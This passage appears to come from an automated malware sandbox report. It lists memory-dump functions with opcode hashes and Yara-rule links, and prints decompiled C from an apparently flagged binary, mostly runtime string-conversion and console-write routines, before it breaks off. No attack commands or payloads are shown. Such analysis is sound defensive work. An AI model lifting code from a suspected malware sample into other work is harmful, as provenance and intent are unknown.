                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fdbd7ad4a13a38f303ba3c3b95cc9e9ab27818cc5082082d1ae3231f7e372ee4
                • Instruction ID: 22c06fcb518d800646779a6334bb219bf9bd0c8cc780742cc25f1df4c5cae5cf
                • Opcode Fuzzy Hash: fdbd7ad4a13a38f303ba3c3b95cc9e9ab27818cc5082082d1ae3231f7e372ee4
                • Instruction Fuzzy Hash: 2301453178C281CBCB25BBB5F8544BABBB6BEE525170009BBC40AE7200DB718406C74A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025711DF, Relevance: .1, Instructions: 54COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59ae385df64a3439c7c60a82e643d084c46c403803b5c8285fa81c57c23b5457
                • Instruction ID: 4437de7816c178eff1b4073aff7364a161464650f486b9e1d9453d1cf2dc823b
                • Opcode Fuzzy Hash: 59ae385df64a3439c7c60a82e643d084c46c403803b5c8285fa81c57c23b5457
                • Instruction Fuzzy Hash: BE1104303096808FC3059B39E46886D7FF6BF9620031586EBE08ACF6B2CA358C09CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025705B9, Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 85f381a78ea4bd0ba80351e5584c74d538ba5932677e09287d888df2d17f0e29
                • Instruction ID: be4fee1cf179ebc0b044e5f66362b2df6b208bd8ed851f02b194e5f3d8ef3df2
                • Opcode Fuzzy Hash: 85f381a78ea4bd0ba80351e5584c74d538ba5932677e09287d888df2d17f0e29
                • Instruction Fuzzy Hash: E001AD213552A00FCA8A223D64326BF2BD7AFC6A10718446EE04ADB3D6CC606C0B53DA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0257238F, Relevance: .1, Instructions: 52COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ef3fefde9b09930b1429532e8547feb32cea6c5d8540c0cc19a256089d46e8c
                • Instruction ID: 1a7e3207b42bb73f6bb2217fe0410c8c966fbe1bc7da668d9da759d51fc55d0f
                • Opcode Fuzzy Hash: 9ef3fefde9b09930b1429532e8547feb32cea6c5d8540c0cc19a256089d46e8c
                • Instruction Fuzzy Hash: 71114870998299CFDB249FA4E954AAEBFB2FF44304F1048AEC946E6344DB710882CF55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025805CF, Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314180994.0000000002580000.00000040.00000040.sdmp, Offset: 02580000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80f2cf0c464d541cecf4220f5b088c2a8de387748ea6941e22729400790b1960
                • Instruction ID: 4fd5e0f1b8cb705c01f9ca4b4e3f384593d49c2de7b468530af3addf517b657a
                • Opcode Fuzzy Hash: 80f2cf0c464d541cecf4220f5b088c2a8de387748ea6941e22729400790b1960
                • Instruction Fuzzy Hash: CF01A7765093C06FD7128B169C51862FFB8DF86220709C5DFEC898B653D225A809CBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02588231, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314180994.0000000002580000.00000040.00000040.sdmp, Offset: 02580000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6dfcd0eb70b999a562e0a6c5c072d91cb9ded529a85ed1b8616ab891cce3e8f7
                • Instruction ID: e225922a402abea5956df292ec5c93c8e7971357b6c4185e09db3086f2235b93
                • Opcode Fuzzy Hash: 6dfcd0eb70b999a562e0a6c5c072d91cb9ded529a85ed1b8616ab891cce3e8f7
                • Instruction Fuzzy Hash: 47114F351096849FD716CB10C550B25BFB1FF86618F28C6EED8895B693C37AD806CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025705C8, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4578e92883014d345ada77127ceb0bd0c14423274a82d806c341d2aff6553ab
                • Instruction ID: 7e21542c4b14b74bdfd401ca1a98bd704c6d38527826eb4cddb7785b699cbdc8
                • Opcode Fuzzy Hash: e4578e92883014d345ada77127ceb0bd0c14423274a82d806c341d2aff6553ab
                • Instruction Fuzzy Hash: 1CF0B4217112204FCA88327E64227BF22CB7BC6E51714442EF10ADB3C5CD70AC0753EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02571218, Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bd730599f5c61b74da1142bb9517db825cf441fdc80a1f5def0d89cc133d3629
                • Instruction ID: 5a1a065c724e7ceff46e4d7883b438ab45f29e11e88c4ab8b7671c530bd4b863
                • Opcode Fuzzy Hash: bd730599f5c61b74da1142bb9517db825cf441fdc80a1f5def0d89cc133d3629
                • Instruction Fuzzy Hash: E401A430314510CFC648AB2EE45896D7BEABFD570072184AAE50ACB775CF72DC09CB85
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02570908, Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bb0b2797e4c2da12e41538ba9c3a10ebf56288bb89ea9cee22197a678b95d022
                • Instruction ID: 122de6be641a058320f0f1dbe346b1802984cae47f0b4d463463f9e233b5b7dc
                • Opcode Fuzzy Hash: bb0b2797e4c2da12e41538ba9c3a10ebf56288bb89ea9cee22197a678b95d022
                • Instruction Fuzzy Hash: 75F0273095D3948FD75487B468206AF7FF57F92240F05499FDC43972D2D9A45C06C355
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02570918, Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc96b707a976f3f7851bdc8643be7d30ba2c32cc595d85eb1224cec6d0490236
                • Instruction ID: af3a41ab254ad0900d42d3f94789184c9076c90a5fa0176f5a4778e1401600ad
                • Opcode Fuzzy Hash: fc96b707a976f3f7851bdc8643be7d30ba2c32cc595d85eb1224cec6d0490236
                • Instruction Fuzzy Hash: 25E02B32F552189BDB505AF5BC001AFBBE9B795650F004D37DD07D3280D9B09901C2D5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02588300, Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314180994.0000000002580000.00000040.00000040.sdmp, Offset: 02580000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
                • Instruction ID: b453b9f4af21fabf6335d04164d4b29faf714fe8b8f6ebf9a14ee3a9cc119781
                • Opcode Fuzzy Hash: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
                • Instruction Fuzzy Hash: 4FF06D35144644DFC302CF04C540B25FBA2FB89718F24CAADE9491BB52C337D813DA85
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025805F6, Relevance: .0, Instructions: 27COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314180994.0000000002580000.00000040.00000040.sdmp, Offset: 02580000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 513222a2a5055945d763c39c99aafffa2ae0237bfc20baeeb2051274d21531b7
                • Instruction ID: 13ffb31dd6c5643e456bff98c6bfabf3a59ebd4cec467bddb7eee1e21b8f03e2
                • Opcode Fuzzy Hash: 513222a2a5055945d763c39c99aafffa2ae0237bfc20baeeb2051274d21531b7
                • Instruction Fuzzy Hash: 00E092766406004BD750CF0AEC81462F7A4EB84631B08C17FDC0D8B701E636F508CEA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02572D20, Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9e5852ad21e67da82816d6786f930e2b7c0b71913fdd769662e75b45051f1f84
                • Instruction ID: 243d18284d7fef1a9ff06b60a7780dd0fa9b18d9878612c06a1acb9cde6aa80b
                • Opcode Fuzzy Hash: 9e5852ad21e67da82816d6786f930e2b7c0b71913fdd769662e75b45051f1f84
                • Instruction Fuzzy Hash: D9D0173408D2D49FD32243A83C72BE13F20AF1B205F080AD7DCCA8E0A780811407C646
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0257064F, Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d436a415f4490c18398ae130066af872245b1b371321c7b43be0c0f1e87c79f
                • Instruction ID: aeb6446564401e4ad71a9cea6b4653c6a8c6219fd0dbf87b91bc51ab6bb0a044
                • Opcode Fuzzy Hash: 8d436a415f4490c18398ae130066af872245b1b371321c7b43be0c0f1e87c79f
                • Instruction Fuzzy Hash: 9CD0A7B28CF2D48FC7954BB02C3A4F83FB0EEA32547148DEBC8424A872C5622597DB05
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025702A1, Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed15e9f662b43247044fb4797414dc27cdf7961fae3bb029985bf3a92fc9df17
                • Instruction ID: 7d1d2eb076174079dd45ce2554dbf3884ce54de2bf465f2d804a4d9fe621c0a6
                • Opcode Fuzzy Hash: ed15e9f662b43247044fb4797414dc27cdf7961fae3bb029985bf3a92fc9df17
                • Instruction Fuzzy Hash: 9AE0EC2518DA84CFC3629768E9A09967FF1AE422003458889D0C647595C620A80AC741
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0257016F, Relevance: .0, Instructions: 18COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5cbf7eeaf5930b928280d3ef0cf6550bcaba96758ef84b8a1449712cf00b4014
                • Instruction ID: b1fb9bd565f51483ab696138c402728c75167f95eff7e31265d88ad0f49fca26
                • Opcode Fuzzy Hash: 5cbf7eeaf5930b928280d3ef0cf6550bcaba96758ef84b8a1449712cf00b4014
                • Instruction Fuzzy Hash: 48E0C2356063808FCF055770A86A05C3B70AF5521270406BED827C7BE0EA7A8496CA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A523F4, Relevance: .0, Instructions: 15COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.313737087.0000000000A52000.00000040.00000001.sdmp, Offset: 00A52000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f61bb0e4998a06d0380a3cf2da477628d1e99a518bb2449a4d6956f2f336206e
                • Instruction ID: 6663879e60f7c4ae270e5432dc9fe6eb8821a9ed5798bca72384e6d31e7034f9
                • Opcode Fuzzy Hash: f61bb0e4998a06d0380a3cf2da477628d1e99a518bb2449a4d6956f2f336206e
                • Instruction Fuzzy Hash: 3CD05E79244A824FD3268B1CD1A8B953BE4AB52B05F4684FDAC008B6A3C778D985D700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02570180, Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fdbf9d886c105357a64a9611afb38ab38ecffbaaa90de56a3b305561f471ffa2
                • Instruction ID: 515e52718d28fa0470d4d65182d0819cfe80decf30a1027bf90457ea5007afd8
                • Opcode Fuzzy Hash: fdbf9d886c105357a64a9611afb38ab38ecffbaaa90de56a3b305561f471ffa2
                • Instruction Fuzzy Hash: ABD01234201344CFCB086BB0E41D41C37B9AB48206700087DE80787B50EE76E851CA40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02570660, Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 44d6275de898e88388b46a4ed03914cba397786c935a587c3d28451a7aefe15c
                • Instruction ID: 48757ebffca3c786050127ad63141157ad777646b5d507178ee40c776f902ea2
                • Opcode Fuzzy Hash: 44d6275de898e88388b46a4ed03914cba397786c935a587c3d28451a7aefe15c
                • Instruction Fuzzy Hash: 77C09B710C9268CEC6549BB17C1543D725976D1715750CD36D50100175CA72B462D95D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02572EC0, Relevance: .0, Instructions: 8COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 536a2a391a13838338e6341707599d73a68e4b6537e9e9fdd661dde623619290
                • Instruction ID: 228ca7626fc5661b882906bd52ea5655273cd76f2ae41f8c007f856de7339458
                • Opcode Fuzzy Hash: 536a2a391a13838338e6341707599d73a68e4b6537e9e9fdd661dde623619290
                • Instruction Fuzzy Hash: B7B012302442090B178097F13C08B27779C55404057501060DC0CC0100F650D0902145
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xabc530a
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xabc530a
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822b
                0x00408232
                0x00408235
                0x0040823d
                0x00408241
                0x0040824d
                0x00408250
                0x00408253
                0x0040825a
                0x00408262
                0x00408265
                0x0040826b
                0x00408271
                0x00408276
                0x00408278
                0x0040827b
                0x00408280
                0x0040828a
                0x00408291
                0x00408294
                0x0040829b
                0x004082a2
                0x004082ce
                0x004082f4
                0x004082f6
                0x00000000
                0x004082d0
                0x004082d3
                0x0040839a
                0x004083a6
                0x004083b1
                0x004083b6
                0x004082d9
                0x004082e0
                0x004082e5
                0x004082eb
                0x004082f1
                0x00000000
                0x004082f1
                0x004082eb
                0x004082d3
                0x004082a4
                0x004082a8
                0x004082ab
                0x004082b1
                0x004082b3
                0x004082b6
                0x004082ba
                0x004082f7
                0x004082fa
                0x004082fb
                0x00408300
                0x00408306
                0x0040830c
                0x0040831b
                0x00408321
                0x00408327
                0x0040832c
                0x00408348
                0x004083bb
                0x004083c1
                0x0040834a
                0x00408352
                0x0040835b
                0x00408361
                0x00000000
                0x00408363
                0x00408365
                0x00408368
                0x00408381
                0x00000000
                0x00408383
                0x00408387
                0x00408389
                0x0040838c
                0x00000000
                0x0040838c
                0x00408387
                0x00408381
                0x00408361
                0x0040835b
                0x00408348
                0x0040832c
                0x00408306
                0x00000000
                0x0040838f
                0x0040838f
                0x004083c3
                0x004083cd
                0x004083d5

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                • __fassign.LIBCMT ref: 004082E0
                • __fassign.LIBCMT ref: 004082FB
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                Memory Dump Source
